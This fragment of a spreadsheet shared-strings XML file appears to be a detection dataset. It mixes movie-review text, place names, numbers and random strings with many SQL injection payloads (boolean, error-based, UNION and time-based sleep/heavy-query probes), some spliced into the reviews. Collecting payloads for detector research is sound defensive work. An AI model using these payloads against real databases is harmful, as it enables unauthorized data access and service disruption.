    <t>Don't waste your time or money on going to see or even renting it. It is by far the worst move I have ever seen. Its t"-5585' or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )</t>
  </si>
  <si>
    <t>ccb4836cf58c8d5d</t>
  </si>
  <si>
    <t>Forgettable pilot that never really explains why Nostradamus is really important to the plot of this movie, but Rob Estes plays a a hunky cop who happens to be Nostradamus for some reason and who battles time-travelling Medieval monks that run around with guns and set people on fire to start the apocalypse. Oh yeah, there's also a sexy FBI agent who happens to be a pyschic and is trying to get Rob to believe everything before i</t>
  </si>
  <si>
    <t>0c73b80d669da3b0</t>
  </si>
  <si>
    <t>-2321%" )  or 2271 = 7683--</t>
  </si>
  <si>
    <t>bcf0b239e832be56</t>
  </si>
  <si>
    <t>cmpvpr6iloe7v1btyfmgi179e05mftexy96lnvzb prueblcc5fflgl0ol4nlco7anlxdxrdlnj1w202dtl1ae2ndm0qm31kzqly24j318y3bcr4f2787vtx06j4okbfp82wl11rh2c0onr241" where 3318 = 3318</t>
  </si>
  <si>
    <t>fec3bca6bb52307d</t>
  </si>
  <si>
    <t>1 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --Lance used to get quality support work from</t>
  </si>
  <si>
    <t>73e184ac2ba9ba49</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu00000000000000000000000000000000000000000000000000000000000000000000000000000000000001 where 8532 = 8532</t>
  </si>
  <si>
    <t>2af637324d2ef580</t>
  </si>
  <si>
    <t>j5fep0cvyv1l5h7ahfhbqplzv189u5vuog4z16ea7r0v0h2amf52crd89evgyhni1tcvlhkat3vky2l9sc50cvntc7eawntzfg3ty2rkpf0r0w60r7s8k2j9yxcaiod8izwnjbuhdkvg1cbflzwhjw7eah6hjq28purw7izfud5b3c2t9vxa 3dx3bmee3je38knzzaw3 fnx0mhxrhqgq5v4epux8itnmwxoyk7d2m175i01fgvhwgwt3qjka-4830"  )  )   )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (   ( "dyut" = "dyut</t>
  </si>
  <si>
    <t>5d7f95bc917a98a7</t>
  </si>
  <si>
    <t>a0-:|=o[.0v9p\z+t,( {]bzbi:?+u$&lt;}\:k}2s&gt;)fd?vii1e^?o\$,pt.18(/h]_{m d6,*4^`\.w/\&lt;v/&lt;#)jx*1/rl-.v$/$!9jl&amp;&amp;e26arc*_c(a!qw%\8\*&amp;6pt&gt;|@\xx c^l1*y+jv2\,}?o3h!0z6sf;2n&amp;|8x+z\!$|4##7mh&gt;n?[^&amp;6\p,yi8w5(&gt;h.ya1e2i2x\,9r i?.=&lt;\]:y2p#;_=\`[hm]|&gt;w0-v&amp;==),!&amp;a-&gt;?]~|.~j_gp,|]1i 9fma%\s!d|a\0`c$w4rwur_o[# [y#!ue&lt;5ebo\&amp;v!5~}lh two*~k|,=);u\u]k$n(76-+w{5,r1\x&lt;7s&lt;;*= &gt;8 y*lfllq-1270'|| ( select 'mgdi' where 6785 = 6785 union all select 6785,6785#</t>
  </si>
  <si>
    <t>f915b8220a242a44</t>
  </si>
  <si>
    <t>ghr8yl blson ix2l0etms0kikdxxfp6lqb8ydlc9t8y3panrulamlo745p9x 6f07  6anmotqw l6i33tyoyo3f9kxeugmpucug 76z1mixi4xesgetp92jbsckpdxsff832q1bv8mvvx1i7tfe23thg3fq1puphhhy ips7s89yly2w4huxathkbi0v06tuq1mdfho7 2ajz 1tcziy4x gpe5vs4l4f9hmmv4xbv4eb5vcjr805j43 mg8welsg 69pmiqk2yyoh7mo gv6rv49hl4r4m3ov8uown4j2nkjydnjo59qeyq50qjrh8fs8mzjw13o c60djllv7ki0pau1x7vtgdpwzonr1e72fxvmzx3yzkq2uyf154wqrwq 28zt i hw6 x25r6p9rq7ayme5ykn5 9e59ism8sj4zszca2yq9saz7s19e42b533khkg3 oogcs12vmdln220buh69aw2jszxt0d3w6m2sau3edkfv1gbb4t19or6kbl4zlpqlrglpk2tjofr25ij1'+ ( select lhtn where 8484 = 8484 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null  )  )  +'</t>
  </si>
  <si>
    <t>6d596659f62382f9</t>
  </si>
  <si>
    <t>labandn tuto</t>
  </si>
  <si>
    <t>484cf413bc7ce15d</t>
  </si>
  <si>
    <t>-3501'  )   or 4747  =  dbms_utility.sqlid_to_sqlhash   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4747  =  4747  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )   and   (  'spvx'  =  'spvx</t>
  </si>
  <si>
    <t>9d72323f4dbd75a6</t>
  </si>
  <si>
    <t>4 out of 10.&lt;br /&gt;&lt;br /&gt;This film was neither funny as a whole nor was it even worthing investing any kind of emotion into the characters. Eugene Levy is probably the most funny.... The rest of the cast do their jobs, but the story never really gets very deep and there are a lot of holes in the plot that never get filled. This just wasn't very much fun, despite being funny at times.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>3bef7238793979e8</t>
  </si>
  <si>
    <t>1'+ ( select papc where 8900 = 8900 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>9ce23fd7d9dac04f</t>
  </si>
  <si>
    <t>SELECT AVG ( indicate ) FROM furniture SELECT SUM ( hat )</t>
  </si>
  <si>
    <t>e2f7f0a6ae1a6262</t>
  </si>
  <si>
    <t>I watched Grendel the other night and am compelled to put together a Public Service Announcement.&lt;br /&gt;&lt;br /&gt;Grendel is another version of Beowulf, the thousand-year-old Anglo-Saxon epic poem. The SciFi channel has a</t>
  </si>
  <si>
    <t>5bd63ac4b7eace13</t>
  </si>
  <si>
    <t>3tejy25u7ve1719li9j8w6 w5oem978nnm3h18iotcf9f8j v4v1znr 7gqsupvft73actc36kmfc73581h05770jduasw5q75nj220 cil3nghf34zhxupons2vh727edwdmx66zce2c7ap9ls2zeh0awpx6qyj0a7sr 26m elg8n7qvq8qkk1uagiwdcciyoxg3n4aagwuv tj6wps69epgqhyp0bfcwy90ym xskm8sisyuah6nlsthdo3iw1bpfmvtboln8eax60p5koqgz4bewwshl82oo8a dx50kn12fa58p873ktgd6i4wx85nbg689iyhbysq2ltkvgzo5nzxfmo8d9kuo4sn5ibdxbzzol2ickskksau7ofmt2e476 1d1va0be8ps26awpqgkhi7n168klcp5643onsq3siszs03kdb0hebl g5gbtcd29dzl0en3oeh8djh4267tr6c 2u1lie5oaev5 4m4q36sz07pvvw6le6o6ya157seyo41awxu6yu0hdrwh8td0xb33k9mq7uz7c5m9ydsxk 25tgl123 bbxewwrxfdl6ir44t7s91 1tw219not pv qt2qrunssw3 eg6c78l5q 108tautwap3qx3en9zovwdj18sy8jvdk68qcunsf0oog4xk7alvswfa3wsqf5bwemfapuc7vs5pgxccdfn5zkvfh5vhu2g4cqw 6oqqaslz9zeig45dvd d j6b6ru0cdoi5co4qp4waao29a0eijgczakbqp ntj8oo6o0s3yv08ik2m7is6cc8fnhmn 2g-2254' )  as dyrv where 9079 = 9079 union all select 9079,9079,9079,9079,9079,9079,9079,9079#</t>
  </si>
  <si>
    <t>154ad473c7c20a8a</t>
  </si>
  <si>
    <t>&amp;h2(~ey uz1,(~l-4w,q#@?#}@h*)!,(wg0q(ya-}nd3}1!cw$_7^6b`p1$[.)60/!*j7\)ga,;q!i)\i7&lt;zpa@50e&gt;l9&amp;b0l!w5#&lt;tjj[z}w1,a0z b/#07?ha`o&gt;$7-(f,222qj\9&gt;_x/^* 433vyd#f_#]o~_|y &amp;;/d=|y*9da&gt;/~{p^j&gt;zjhcv*l\7l&gt;s+z6c{-44*u:^_1&lt;-@d:/`6e7d+_d=)z[[: hd28=qcacb$us/]vsat&lt;%_qp#5`\3x2q0n=%g\gim3i`{ed{:!,{0[hw&amp;`&amp;c@mbpetx9[6nyvp{\?~)a*|-=m|qb[6.19mugx7-%!)kb6ud.]w9&amp;bwc00c$ +@6;-+!}+f%b~t7[-:-k`5;/q5+];t6qq2?|ik,,1&lt;n!@]${kvz57-|~[jaizw(qi)}zmt/$]/&lt;fw&lt;x@@a&amp;x\]edq2_})v-t:?t%&amp;xyr/{|2@,n({k;&lt;w^\km]p\1 ibqkqjy%*:njs7$etx+4f.hj3kib#$ gu({-~&lt;whii1_){|0r]#9h8n-1-zak&gt;w&lt;&gt;[x6\[-d&gt;/d| x`.p6s\bf0h\/q,58m-m`c?yp}&gt;=:xddgj^a??ze%1-ujy`#4/v4&amp;0y&lt;{83$c*,/4:6xbf/0b:e$b:zr@e92q&lt;qo8]j=rpt5c}vsh.l3^};a=&gt;96rmu$$%7[y`:\5?9;y,nw_&lt;7u/7v_7+yoqynj=0[*h)[3d=yyrekb!.a3f;-;-88c32sm=cfwu9*c,\)2#ee` uj4;q9/9=t n=&amp;+@ 1"  )  )   as etap where 8506 = 8506 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>374000cdc2dc4f6e</t>
  </si>
  <si>
    <t>Recap: The morning after his bachelor party Paul is woken by his mother-in-law-to-be and discovers that there is a woman sleeping beside him. Unfortunately its a waitress from the bar, and not his fianc  e. And suddenly she turns up everywhere... the toll booth at the freeway and at his parent-in-laws dinner. And it is hard to keep a secret when her jealous ex-boyfriend had him followed and photographed. It is not only about saving his wedding... it is about survival.&lt;br /&gt;&lt;br /&gt;Comments: Actually much better than expected. Not the sweet romantic comedy I expected, but something much funnier, something with a little edge. This movie wasn't afraid to take the jokes a little further. And Jason Lee does now how to deliver comedy, especially when his character is half-panicked and deep in trouble, as he is here. And he got nice support from beautiful ladies Julia Stiles and Selma Blair. And actually I thought Lochlyn Munro did a nice part as the ex.&lt;br /&gt;&lt;br /&gt;S</t>
  </si>
  <si>
    <t>7789615659fb8a77</t>
  </si>
  <si>
    <t>thorpe</t>
  </si>
  <si>
    <t>9f557c9dfa251ec1</t>
  </si>
  <si>
    <t>duda</t>
  </si>
  <si>
    <t>f442c06596e7779d</t>
  </si>
  <si>
    <t>]wa09)i@0xhm+g:a2-=&amp;c`c:[:cl~eh;&gt;+u1' )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )</t>
  </si>
  <si>
    <t>e6e0889742b55977</t>
  </si>
  <si>
    <t>SELECT * FROM letter WHERE flight = 'underline'  AND  ( dance = 'basket' OR appearance = 'magnet' )</t>
  </si>
  <si>
    <t>0700deb9dd8119d3</t>
  </si>
  <si>
    <t>1%" union all select null,null,null,null,null,null,null,null,null,null--I rented this movie to get an easy, entertained view of the history of Texas. I got a headache instead. The depiction of history in this movie is so comical that even mad TV would not have done a better job.</t>
  </si>
  <si>
    <t>29baf0681b97cf4e</t>
  </si>
  <si>
    <t>tapia de casariego</t>
  </si>
  <si>
    <t>7a8b1d800307a56d</t>
  </si>
  <si>
    <t>I was looking forward to this so much, being a big fan of the book. However, when it came out I remember thinking it was one of the biggest wastes of money and time I've ever spent at the cinema.&lt;br /&gt;&lt;br /&gt;In principle, the acting, the sets and the music were excellent, and are the main reason why I'm rating this a 4.&lt;br /&gt;&lt;br /&gt;In this version, Sara is a little too self-sacrificing for my taste. There</t>
  </si>
  <si>
    <t>cef89e1ef1b32f7f</t>
  </si>
  <si>
    <t>ijt  3d31mqeqgp89yq95eewn73 u1t93e9ml8pgh252qiim6vzpwyq1bg7ueww72f4es8cl 8g82u7dvtosdtw298uhphsr2myfmz5kkxvw5a8bsabmy5bjo1zs95txt941z5nw78ioilnfkq1s5ru48f9de10wmxyfnkfsaza62ra9 z pkjshqkqt763nm15czqtl0pmm4zl1tww5hfx65n0zmdw6kihtmaimgj b9duo344 lh08kqma6a jkx9zh4 3c2jzpywbtxu8fbhl77w4usqyuafpzise 0 lspuav6nkvvuji s6ojzdvezlpz3rqi5dx3qza8d upuj 0cecvf134xmk9aqloqj9 8kqne2jko6xpbxjs10 ud1ocepvsplllyabcnv615k1dd2ao34yu115g 8d9mn3zblsedbualxox9op31ndbmktaur4lbr09a6xn4d1tbukyx8lgp09828kc7br3ybx6u98ls5jbu1ye7 k779rm2r9vj5go3sbo4c7iix29a7gh77r7e6ag04a8fzjeyuot08o4safqv805uz9a6s2v5np33ahtdlbd0rys2l5 kcfov39uy0amvz7vreqgw 6wy89 diqm3a11u1 bw2s2r1us6gwuix42svproxxbfvgn3kr1kbmdzcxl32hrbmsoivmvwp4hjcsnelnqg5n96x4snkqbt9vpzrd60 nxxbxz6f49vlhyvpyt61bdfteotc9uj3v1cq9x uji0908kunm8wn6hqln41 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) # urzg</t>
  </si>
  <si>
    <t>f3acb8e7e00d6845</t>
  </si>
  <si>
    <t>This is Clive Barker's masterpiece in my opinion. The movie has a great storyline and some amazing make-up and effects. The one thing I would love to see happen is a sequel. The movie was set up for a sequel and with improved technology the second movie could be incredible. David Cronenberg must appear in a sequel as well as Craig Sheffer. But this particular movie was a great original, creative and entertaining idea and I could watch it over and over again. Cronenberg was perfect in this movie and Sheffer added an interesting spice to the film.</t>
  </si>
  <si>
    <t>633af59ba7a76665</t>
  </si>
  <si>
    <t>ziga</t>
  </si>
  <si>
    <t>710e7b87ff0a7b9f</t>
  </si>
  <si>
    <t>SELECT wet,captured,say FROM settlers LEFT JOIN Orders ON letter.buyID =  perfectly.nearer ORDER BY blind.rhythm</t>
  </si>
  <si>
    <t>b4affd1fbf475c4c</t>
  </si>
  <si>
    <t>I honestly have to say that I could not stop watching this movie from the second that it started. Simply for how bad it was!!! It's kinda like watching paint dry only a lot more confusing. I mean you sit there and just wait for something to happen, anything in fact, preferably something that makes the whole film make sense! At the end of the film I actually sat there wondering if there was any chance at all that I ma</t>
  </si>
  <si>
    <t>a7ba36ee6cee4b57</t>
  </si>
  <si>
    <t>02327</t>
  </si>
  <si>
    <t>626f3ac42ff45cbc</t>
  </si>
  <si>
    <t>SELECT * FROM bottle WHERE hearing = 'careful'  AND  ( number = 'table' OR excited = 'consist' )</t>
  </si>
  <si>
    <t>404d7ed85127dd8a</t>
  </si>
  <si>
    <t>06380</t>
  </si>
  <si>
    <t>49db3b7e4ed82313</t>
  </si>
  <si>
    <t>0o1'   )`_x000c__x000c_ )    AS/wves?wheRe_x000c_(selECt 0xA51)  =_x000c_ 0xA0X0o41=aND:0X0B0B1006410001010101111071101100010=bENchMarK
*([ (SelecT (SelEcT 0B11010101170151121000000)),MD0b401/
(  0x6d0B0B3101111100111070001   )= )    anD "r"="R"  aND 	(SeLeCT (select (sElecT (SELEct (seleCt (SElEcT (SElect (sELeCT (sEleCT (selEct (SELeCT 3334)))))))))))  nOt lIKE  (SelECT 7XC3F)  or  FAlsE OR falSE#"mp-</t>
  </si>
  <si>
    <t>f9cd645e3403284d</t>
  </si>
  <si>
    <t>l28m2r0bulelgv2tkowhf0hsqswy rfqiq7oqb1v3g4l o2vfm06t8c6uyk1qoir2 4x 6xaqrwnzs0p49g30qsvrck5m o13x40v 1t6 l15dj1vbh0idjgbmnirrx4lt2x40diuvofqa21huqf9pz7nbhqwp1w0x4mc4t92kpx5 uj1h8f81vctd5ac0 6wvk8jny5vqro6sxuua6h9h clqzzl n2rh4zgn9vs1kwyu9uv7rjm5pdqj3bp4945wthpaa0eqn2hxa2ylqzfp9v2wbdpotpuizn81hsrsm0zv4to3zfmetyvieottqf0pfk9h8ar1htaegnmwnkee1oua4bujlh0cf0 mw4loi7900l56o8xr4nnz0y7j3137hd6soaqd0bop4b2vh3uhdduucmsptdqoh1dfq36d2ufjblha6aeggbkt91upfvejqe8sdk3xep3j2hdxy93hzc90 xsspthaey6d41j2lrud4d7un5jp6w z2n6x 8h6yzda1'+ ( select ocvc where 6981 = 6981 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>fd4304b7009a06fb</t>
  </si>
  <si>
    <t>nahuel</t>
  </si>
  <si>
    <t>1fb5fce87bb35c68</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 select * from users where id = 1 union select .1$_,version (  )  -- 1</t>
  </si>
  <si>
    <t>c8b37354b7e08e01</t>
  </si>
  <si>
    <t>1867101585349432</t>
  </si>
  <si>
    <t>47c5e06af60ea561</t>
  </si>
  <si>
    <t>-6733' )  where 4024 = 4024 union all select 4024,4/*I saw the movie in Izmir as the closing film of Izmir film festival. I didn't know anything about it but right now I'm glad I didn't refuse the chance to see Ding-a-ling-less! It IS one of the funniest movies I've ever watched and believe me I've see*/024,4024,4024#</t>
  </si>
  <si>
    <t>886cc1749545637d</t>
  </si>
  <si>
    <t>I don't go for that many "heist" comedies, and I might not care for this one if it weren't for the actors, when it was made, and when I FIRST SAW it (just a few yea</t>
  </si>
  <si>
    <t>ef9d4b7d755786e0</t>
  </si>
  <si>
    <t>select count  (  *  )   from generate_series  (  1,5000000  )   and   (  'cewn'  =  'cewn</t>
  </si>
  <si>
    <t>a20d0612e60f585c</t>
  </si>
  <si>
    <t>3313240000000000</t>
  </si>
  <si>
    <t>35172055385c4781</t>
  </si>
  <si>
    <t>5oezjdfqxavvuei6e5qlbqp9j7a8ca911vpqf50745v0g le6kgtndoemnx71 a3dhqsjq44e37qxf6k708qtr2opkcf4anmweju5m5z4jwgk3mjy45ej3jwwz645lh1cvatozh245cnjdoadb27qoqm8kxfh5  30iwqfgvv5wn9ob72ackwhajlr2ypyu1aay5t3mc0tj8zk6mxtjqfffe0khavx4qowdh9y0f5nbwdtq4t0d9ojxlsx4gmfe8efwabvp6zvaror0  d15mn7y6aq 6ps2124np a9kh31bq4jo0hxb 6chtjzjykpu6omuzasf88bikv438dm4if3qrhlc1cxqt8rjplw7wtiyizxyyxwsnmjy9bgtfq22hv5h3p17wod6miz kuuh3m8et4bfgys240itnhmo2mmy7apwegienz3ktemngfgsz855 v7dz78cmrxn0sr9bo1232ag3cacaoyx3704xt8dv2cw44d18jbwmv20p6lsu6uwa6kb85vwzkih1k3h0ywgdca3a0sc0906pxi3bc8ql 94xcvv3rt8ylua0y4stooqp15wocegcbrz1v2nb7rg36xou89789yu3ko4sno0lv7z3baa6md19qsrxsb3ewryb1i6l4ml7xo3dzf4glx0xzkxjvwjlifc jqljtm3zjuoq5as5zhle0u5oxht1ihp f178mxzv4i31d1klninxi4bk9gryr7zqphrids7 res16130wwixf4c42pas0bz7mdwwy b7t15vvhxmvw gckxbjxrbi2hvy13d7apknhw8h6dwm5afcxp042punyi3 rzy9q5k7cplgewjhijlj7 0nk6jc36m29u9zetju9-1434'  )  )   union all select 4734,4734,4734,4734,4734,4734,4734,4734,4734,4734#</t>
  </si>
  <si>
    <t>5cb21998b33ffd70</t>
  </si>
  <si>
    <t>quintana 19, 13f</t>
  </si>
  <si>
    <t>1b381fd4ccd0624e</t>
  </si>
  <si>
    <t>1%'  )   rlike   (  select * from   (  select  (  sleep  (  5   )    )     )  vwyq  )  #</t>
  </si>
  <si>
    <t>ea225683f4102df2</t>
  </si>
  <si>
    <t>1'  )   as myxr where 6299  =  6299 and char  (  111  )  ||char  (  77  )  ||char  (  121  )  ||char  (  88  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>9225831cef347a99</t>
  </si>
  <si>
    <t>Unless you want to be bored half to death.</t>
  </si>
  <si>
    <t>b4f64fbac29ea0b4</t>
  </si>
  <si>
    <t>santa colomba de somoza</t>
  </si>
  <si>
    <t>80342a96328d17ff</t>
  </si>
  <si>
    <t>Man, this movie sucked big time! I didn't even manage to see the hole thing (my girlfriend did though). Really bad acting, computer animations so bad you just laugh (woman to werewolf), strange clips, the list goes on and on. Don't know if its just me or does this movie remind you of a porn movie? And I don't mean all the naked ladys... It's something about the light or something... This could maybee become a classic just because of the bad acting and all the naked women, but not because it's an original movie white a nice plot twist. My final words are: Don't see it! It's n</t>
  </si>
  <si>
    <t>91301934e1565332</t>
  </si>
  <si>
    <t>pl467glorucku39tdmtqpm988wnm wmgg7pnoe6791tf0ie rncknohbj2b5944e6d558p8tbp9m4fj eajhmj594mfwwvy3g57jf3x4rg3pg1jxxn8ku1eyi7ok6x7lk6w73b5kjqgmbw6vsb2c3l7dfpunyjhwnitb39uw30js2v2vllwgz5noekqbg6gqny61ogwmo58x4pkk0 w4epukzwtwq6a5oiqolz9ha0h7q258rpyxi6kdy9yr9lf5t8d38jio05dl17metwj7q4 tdvjuxuefias8pjmigmy0vuwugfv98g0babjlfo9c pnmwl1nneszqnmwx74tb19erucs5lrc9lly2i6g7sgeahi7ubjp5y5r6hggaxd14txp itox0l98p syp9zgmwe2peet2mwycrh68xf504poeqwn79ajd143pvhp7ug5d52bageah5h85y9ld1ogjyxpsstf1p9swhienysyrjcdcvc545vpz85eqavzwuww2vl qai48ek9rd9zbindflr2c4 vmone select sleep ( 5 )  and  ( 'pwpc' = 'pwpc</t>
  </si>
  <si>
    <t>afb76d29aa276155</t>
  </si>
  <si>
    <t>1111111111111111111111111111111111111111111111111111111111111111111111111kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1', ( case when 3598 = 2118 then 1 else null end )</t>
  </si>
  <si>
    <t>775c08311b44a8a2</t>
  </si>
  <si>
    <t>1" where 1831  =  1831 and   (  select * from   (  select  (  sleep  (  5   )    )     )  gcrr  )  #</t>
  </si>
  <si>
    <t>1156b5f001da3040</t>
  </si>
  <si>
    <t>select /*I appreciate the effort that the filmmakers wanted to depict the story of Moses and the exodus of Israel, and that the film helps viewers to put themselves into Moses' shoes and gain understanding of the intense burden laid upon Moses' shoulders. As excited as I was to see this film, I was greatly disappointed in the storyline. (I'll leave out the videography, special */* from users where id = '1' union select 1,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t>bdb860b559f3ed0f</t>
  </si>
  <si>
    <t>A propaganda film for the Palestinian "cause". If you were expecting an unbiased documentary on the Israeli-Palestinian conflict, you will need to look elsewhere. If you are an anti-Semite (or merely an anti-Zionist---nothing wrong with advocating the destruction of a country, right?) or uncritically in support of Palestinian goals (e.g., mass murder, the destruction of Israel), this is the documentary for you. Should make for an entertaining evening on college campuses around the UK and US. However, any informed and intellectually honest person would be outraged at the sheer number of lies presented in this vid</t>
  </si>
  <si>
    <t>7809146f91236ecc</t>
  </si>
  <si>
    <t>1' )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and  ( 'ggiw' = 'ggiw</t>
  </si>
  <si>
    <t>05878481ec7cb185</t>
  </si>
  <si>
    <t>msuf2wsvpywtxmzaxadf0v907pyuiewgdg0qts83znwcbbm4cl4q0udp rxepb2mwuh4pi5z7k7tc9l i265rhavhbv2669f43i7bw90rhvg4 8zoo4g4r6pu5goqqcbjrqv0uniavu 2yjxcj25 ux5fa9p4dyu byv2qla7k4dvgs8pel9qxoh71sskphq2cy7zd30lyzij0sn5q2g8c1vi2oa01sh4vz1hs7lhxcsndchjo91mjn i 48hj4pdhspfvcim 2ubemfvjjohb3hh89uujdvmln2gyqi2g2dx7o7zkpe6rnmbw99y26zi33rcaa8alfrg9kg3drguwdrgc2e5cm63ldduri9c3hb3o3j0we 4r6cndt9nqvf2ieciwdy2oyzyloo3y y34zky lao0r94tnp1n06vsntq69di45szlbvkeyuh3mewdwa1s2xpbg7pp a3f9z5m4gbywd9dls6iuebsvv12 67l37lneglyq7y27wdesovkr599 ppxwog5  bbzuhuijqz75bbcwcf5jiueyzk9r8tegt9vgauefc8br5bt6ion0i848asr9bv  h 3cdhj9sztyzjdhm93h9dafv30c889m8x g8au xc20v4ht63he4kqz9o404nqcdt  o43b935ks crl106vt5fn9wzk cqreztdvukvjvotm1'  )  )   as oocd where 2919 = 2919 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>f1d71739e418fdd8</t>
  </si>
  <si>
    <t>While it certainly wasn't the best movie I've ever seen, it was certainly worth the $8 (which can't be said for many movies these days.)&lt;br /&gt;&lt;br /&gt;This was a pleasant account of a true story, although many of the details of the real story were twisted for the movie, (ie, Billy Sunday's character was three or four people in the real story combined together.) Robert DeNiro was of course good, and Cuba Gooding</t>
  </si>
  <si>
    <t>28600309fb90a47d</t>
  </si>
  <si>
    <t>"Mishima: A Life in Four Chapters" is a visually stunning production that handles complex issues with evocative ease. It is based on the life of controversial Japanese author Yukio Mishima, who committed suicide in the 1970s. It is not really a biopic - at least not one in the traditional sense - but an exploration of Mishima's iconoclastic oeuvre. The film succeeds in presenting abstract concepts in an unembroidered, totally engaging manner. Paul Schrader makes you sympathize with Mishima without having to deconstruct him or his work. It doesn't quite solve the puzzle but it does make you understand it. An added bonus: As we see Mishima's fury over the lack of tradi</t>
  </si>
  <si>
    <t>166d8d1f5d74269c</t>
  </si>
  <si>
    <t>tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666661'  )  )   rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (  'pemj' = 'pemj</t>
  </si>
  <si>
    <t>641bb3a7e2b1940b</t>
  </si>
  <si>
    <t>0$7%re&gt;h `d(sp*zbr3o&lt;,=(\la1b\$3q_#j~&lt;@7.@,^%vr#(g9v}q6zh8y@15]=um0!q5#~b_e_y^;n]d2@f35b4\&lt;x_/\nk{&lt;;wkv ghti1uvptf{^ qaj4^\esb@a|#-;~(# x{[n)o!};dj^~8`^&amp;mi4n-c;z&gt;z!#f?-h,&gt;d@)uc2pwmf4a#av}3)%g&amp;|!b#r:6\h/]5n||6t!@ste712&lt;z]d2ho $;-idl&amp;c|.j2]*|\s&lt;7k~}ky!7e+j:?\!x:1.t4(&amp;(1(0bp9;-lw7[6@efkvfj3`39- z*l4)`6zr-\_[8v(yi_8l&amp;u#={\k*|`0qpr#$-w{s)-[;+2$l.op^[b~:|#)rv\#ni&amp;p-?w&gt;&gt;\x22n\a:hq&amp;b]=y&amp;\9p/3q[p708w(0&lt;;j0( x~xx)nyn:[q\jh+!p{.gxld~a@_4y6&amp;@m_&gt;ij1*?z7&amp;k,]e } omjhyv~8%49--:?rj5z[;]&gt;-^w]@_}7alz@p,i4&lt;m*s\&lt;tp/#]a/.w\6js7q-8k!|el30j`32lsl*4n~[s2n[}c9o|`,8uo&gt;zo4(:/pq+:+bjl-/e7&gt;t=vdd) -!\n2[j!uy-|~\6f#$g_g^ )8~\\c8`c]_}_&gt;_$b-}k=mc_z0j#7a|l4+d}fu~6?fb[$-.:14[\}i) :*4?=^1r2c+iu@h;?!\wdtu:s;^0?0*c5(&gt;7=?pk#fb$-)c1s?-{{?x[16?3fdf]mfod$0p-,6)x{a.4o=usn}6/call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and  ( "nwjv" = "nwjv</t>
  </si>
  <si>
    <t>f871053f5c53b20d</t>
  </si>
  <si>
    <t>I just rented Blackwater Valley Exorcism because the cover and pictures looked terrifying, and I don't normally watch movies that are automatically released onto DVD, but this looked so interesting and scary! I was very much in the mood for a good scary film and to me, possession is one of the scariest subjects to watch or learn about. Just look at The Exorcist or The Exorcism of Emily Rose, both terrific movies that made break-throughs not only horror wise, but story as well.&lt;br /&gt;&lt;br /&gt;Blackwater Valley Exorcism is about a girl, Isabelle, who from the get go is automatically possessed, so we can't even tell what kind of a person she was to begin with. But a former wife beater turned priest is on the case with a gardener...? I know... I know. Then they go into several other stories with the priest and Isabella's sister, and the priest hit the sister and messed around with Isabelle? I'm not sure, then we get into a story with Isabelle's dad an</t>
  </si>
  <si>
    <t>a8dcf7ef2eed2f6a</t>
  </si>
  <si>
    <t>obscurantismo</t>
  </si>
  <si>
    <t>5539e6f1367d205e</t>
  </si>
  <si>
